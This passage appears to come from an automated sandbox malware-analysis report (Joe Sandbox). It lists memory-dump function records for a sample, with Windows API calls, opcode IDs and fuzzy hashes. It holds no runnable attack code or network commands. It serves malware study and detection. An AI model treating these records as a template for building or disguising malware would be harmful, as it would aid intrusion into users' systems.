                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                              • String ID: SysMonthCal32
                                                                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                                                                              • Opcode ID: 129675c43ee9848ab3365f380461e6da4b8ad26da2ded5998519174d4e63883f
                                                                                                                                                                              • Instruction ID: b0c2c09a674218f4198097f8d2c613b7269afaea8227498928f571a42fbbd492
                                                                                                                                                                              • Opcode Fuzzy Hash: 129675c43ee9848ab3365f380461e6da4b8ad26da2ded5998519174d4e63883f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6121BF72600219ABDF118F50DC4AFEB3BA9EF88728F111214FA157B0D0D6B1F855DBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E351A3
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E351B1
                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E351B8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                                                                              • Opcode ID: 6f8f52e5e9b0868c02a38ce2c5135d386886f89e3e8485a93f01a699f7314357
                                                                                                                                                                              • Instruction ID: d16a5299f2c664952d88794fbf7393ece855b677b79565a88c3bf00a1fe4dde6
                                                                                                                                                                              • Opcode Fuzzy Hash: 6f8f52e5e9b0868c02a38ce2c5135d386886f89e3e8485a93f01a699f7314357
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B2181B6601649AFDB10DF24DC85DB73BADEB5A368F141059FA00A7361CB70EC05CAA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E342DC
                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E342EC
                                                                                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E34312
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                                                                              • String ID: Listbox
                                                                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                                                                              • Opcode ID: 47a69ea0367d13f82f6f42c1bbc7eaaf53b3d6a8730bfa00d847348b99714357
                                                                                                                                                                              • Instruction ID: 1826e1181b65fcb84870935dab79c2494b2f58694d56f950e3b6ba6f638c588f
                                                                                                                                                                              • Opcode Fuzzy Hash: 47a69ea0367d13f82f6f42c1bbc7eaaf53b3d6a8730bfa00d847348b99714357
                                                                                                                                                                              • Instruction Fuzzy Hash: 3021AF72604218ABEB118EA4DC88FAB3B6EEB89758F119114F901BB1E0C671AC51C7A0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00E1544D
                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E154A1
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,00E3DCD0), ref: 00E15515
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                                                                              • String ID: %lu
                                                                                                                                                                              • API String ID: 2507767853-685833217
                                                                                                                                                                              • Opcode ID: f07d1e0d2db8b0713f7d167d51c1798e4d9bf48f7eb712516542925037816a56
                                                                                                                                                                              • Instruction ID: 5a17a1a89beb37d55be1e322f8f33aa2c3c9e998828b5fd9d63074b3e06d95e8
                                                                                                                                                                              • Opcode Fuzzy Hash: f07d1e0d2db8b0713f7d167d51c1798e4d9bf48f7eb712516542925037816a56
                                                                                                                                                                              • Instruction Fuzzy Hash: 49314F71A00209EFDB10DF64C885EAA7BB9EF05308F1440A5E809EB262D771EE85DB71
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetActiveWindow.USER32 ref: 00E38339
                                                                                                                                                                              • EnumChildWindows.USER32(?,00E3802F,00000000), ref: 00E383B0
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                              • String ID: ($(
                                                                                                                                                                              • API String ID: 3814560230-3881858432
                                                                                                                                                                              • Opcode ID: 0e0707479d612cc963df36583e139810ddf18cb88f2c49b5920a22a686152bb7
                                                                                                                                                                              • Instruction ID: b054337514fd7dce01a94c0583d3b8f28d4ca6e5f16d905eb06e21043e678c90
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e0707479d612cc963df36583e139810ddf18cb88f2c49b5920a22a686152bb7
                                                                                                                                                                              • Instruction Fuzzy Hash: 07215C34200305DFC724DF29D854AA6BBF5FB8A720F24161DFA79A73A0DB70A855CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E34CED
                                                                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E34D02
                                                                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E34D0F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                                                                              • Opcode ID: 2dae555ce39d1bf3f310e41610440e5041425fb3665e51ee6f490fb53dcb9273
                                                                                                                                                                              • Instruction ID: 673a4eb992d33602324e7f023ed699e17fa43be9b92bb46b145af0f8ee3c1230
                                                                                                                                                                              • Opcode Fuzzy Hash: 2dae555ce39d1bf3f310e41610440e5041425fb3665e51ee6f490fb53dcb9273
                                                                                                                                                                              • Instruction Fuzzy Hash: FE11E3B1240248BEEF215E65DC0AFAB7BA8EF85B68F111514FA55F20E0C671E850DB20
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                                • Part of subcall function 00E036F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E03712
                                                                                                                                                                                • Part of subcall function 00E036F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E03723
                                                                                                                                                                                • Part of subcall function 00E036F4: GetCurrentThreadId.KERNEL32 ref: 00E0372A
                                                                                                                                                                                • Part of subcall function 00E036F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E03731
                                                                                                                                                                              • GetFocus.USER32 ref: 00E038C4
                                                                                                                                                                                • Part of subcall function 00E0373B: GetParent.USER32(00000000), ref: 00E03746
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00E0390F
                                                                                                                                                                              • EnumChildWindows.USER32(?,00E03987), ref: 00E03937
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                              • String ID: %s%d
                                                                                                                                                                              • API String ID: 1272988791-1110647743
                                                                                                                                                                              • Opcode ID: 850cf4a7d971f957b04a3d7aad42e7f0bdcbaa06ae555c945a966df9347384e1
                                                                                                                                                                              • Instruction ID: a89b4786eeca0ee0f3d881e8ced2cda3b63d05ce62b3302826601c33cd43c6bf
                                                                                                                                                                              • Opcode Fuzzy Hash: 850cf4a7d971f957b04a3d7aad42e7f0bdcbaa06ae555c945a966df9347384e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C11E7B5A00209ABCF01BF749C86AEE77AD9F94304F045065BD09BB2D6CF719945DB30
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00DA5A34
                                                                                                                                                                              • DestroyWindow.USER32(?,00DA37B8,?,?,?,?,?,00DA3709,?,?), ref: 00DA5A91
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                              • String ID: <)$<)
                                                                                                                                                                              • API String ID: 2587070983-10615988
                                                                                                                                                                              • Opcode ID: 18c949e28d9037bef3683294ba517e38e79a277bfc5f1a080effd73d70ef8131
                                                                                                                                                                              • Instruction ID: 81f71bd9aed96a9a1788fe7c6c2d645c5ac8bc0181e34b86d8b824f9c9d7b4a9
                                                                                                                                                                              • Opcode Fuzzy Hash: 18c949e28d9037bef3683294ba517e38e79a277bfc5f1a080effd73d70ef8131
                                                                                                                                                                              • Instruction Fuzzy Hash: 5421CA74706501CFDB18DB16F895B2533E1EB86711F0C915DE70AAB269CB34AC88CB21
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E36360
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E3638D
                                                                                                                                                                              • DrawMenuBar.USER32(?), ref: 00E3639C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 3227129158-4108050209
                                                                                                                                                                              • Opcode ID: 70ce2457b56765aa2e6ef7a1b53fa8b0713e3d9d48b22b6803351aed228e7554
                                                                                                                                                                              • Instruction ID: 0c50ca773cd141f5822cbdfc240faf32ccccb953aa8760b7d2646a33f39984d6
                                                                                                                                                                              • Opcode Fuzzy Hash: 70ce2457b56765aa2e6ef7a1b53fa8b0713e3d9d48b22b6803351aed228e7554
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E015B32514218EFDB119F21DC88FAABFB4FB84355F148099E849E6150DB308A85EF31
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32(?,00E728E0,00E3AD55,000000FC,?,00000000,00000000,?), ref: 00E3823F
                                                                                                                                                                              • GetFocus.USER32 ref: 00E38247
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                                • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00E382B4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 3601265619-2063206799
                                                                                                                                                                              • Opcode ID: a0b0b385fe671493030d061f8160c5e1e836f38175cff27ca6dfd15f91f647ea
                                                                                                                                                                              • Instruction ID: d473166f5e3bb261fe705b0b370bc223f70fb790695c489a1903825907f17579
                                                                                                                                                                              • Opcode Fuzzy Hash: a0b0b385fe671493030d061f8160c5e1e836f38175cff27ca6dfd15f91f647ea
                                                                                                                                                                              • Instruction Fuzzy Hash: FA017531602A00CFC315DF79D858A663BEAEBCA324F29015DE516A72B0CB31AC4BCB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyAcceleratorTable.USER32(?), ref: 00E38576
                                                                                                                                                                              • CreateAcceleratorTableW.USER32(00000000,?,?,?,00E1BE96,00000000,00000000,?,00000001,00000002), ref: 00E3858C
                                                                                                                                                                              • GetForegroundWindow.USER32(?,00E1BE96,00000000,00000000,?,00000001,00000002), ref: 00E38595
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 986409557-2063206799
                                                                                                                                                                              • Opcode ID: 70cd6ba5ccfc825ea487b1438fb4211f56044973de555ec0e1f8fc95e8c2d33e
                                                                                                                                                                              • Instruction ID: e607ed527362d1dac30a3d57c131977d006557789f9cc2d3a756607c0a808508
                                                                                                                                                                              • Opcode Fuzzy Hash: 70cd6ba5ccfc825ea487b1438fb4211f56044973de555ec0e1f8fc95e8c2d33e
                                                                                                                                                                              • Instruction Fuzzy Hash: DD016D30601309EFCB25DF6AEC88A657BB1FB44325F14551DF615A72B0DB30E898CB40
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E74038,00E7407C), ref: 00E38C1A
                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00E38C2C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                              • String ID: 8@$|@
                                                                                                                                                                              • API String ID: 3712363035-2203533388
                                                                                                                                                                              • Opcode ID: 94f7df82892ea64499214317c6b6df776fc5083e3537942c0035aa19facabf0d
                                                                                                                                                                              • Instruction ID: 61e9b1dc0ea90ed588992f49829227028451fb4b30de37849eb6782d80de17ee
                                                                                                                                                                              • Opcode Fuzzy Hash: 94f7df82892ea64499214317c6b6df776fc5083e3537942c0035aa19facabf0d
                                                                                                                                                                              • Instruction Fuzzy Hash: 46F03AF2581304BEE710AB62AC4AFB73E5CEB14350F004025BB0CF61E1DB654C5892BA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0a5dc4f6409fe466696d633a4514e5f9e66b7c874c430141bd13893bc88ecfe4
                                                                                                                                                                              • Instruction ID: d8e0e39d15bbe7180b6b926e537f3fa91b529f0d511cd57f7759736e47be45d3
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a5dc4f6409fe466696d633a4514e5f9e66b7c874c430141bd13893bc88ecfe4
                                                                                                                                                                              • Instruction Fuzzy Hash: 22C13975A0020AEFDB14CF94C894FAAB7B5FF48718F249598E505AB291D731EE81CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                              • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                              • Instruction ID: 85db6ce00a18817a87ef1c4ba878927830801d8a08cbb13aa08006bdf3d1d6b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                              • Instruction Fuzzy Hash: 2CA145729403869FDB21DF18C8917AEBBE4EF51314F2841AEE5959B381C3789981C770
                                                                                                                                                                              APIs
                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E40BD4,?), ref: 00E00EE0
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E40BD4,?), ref: 00E00EF8
                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00E3DCE0,000000FF,?,00000000,00000800,00000000,?,00E40BD4,?), ref: 00E00F1D
                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00E00F3E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
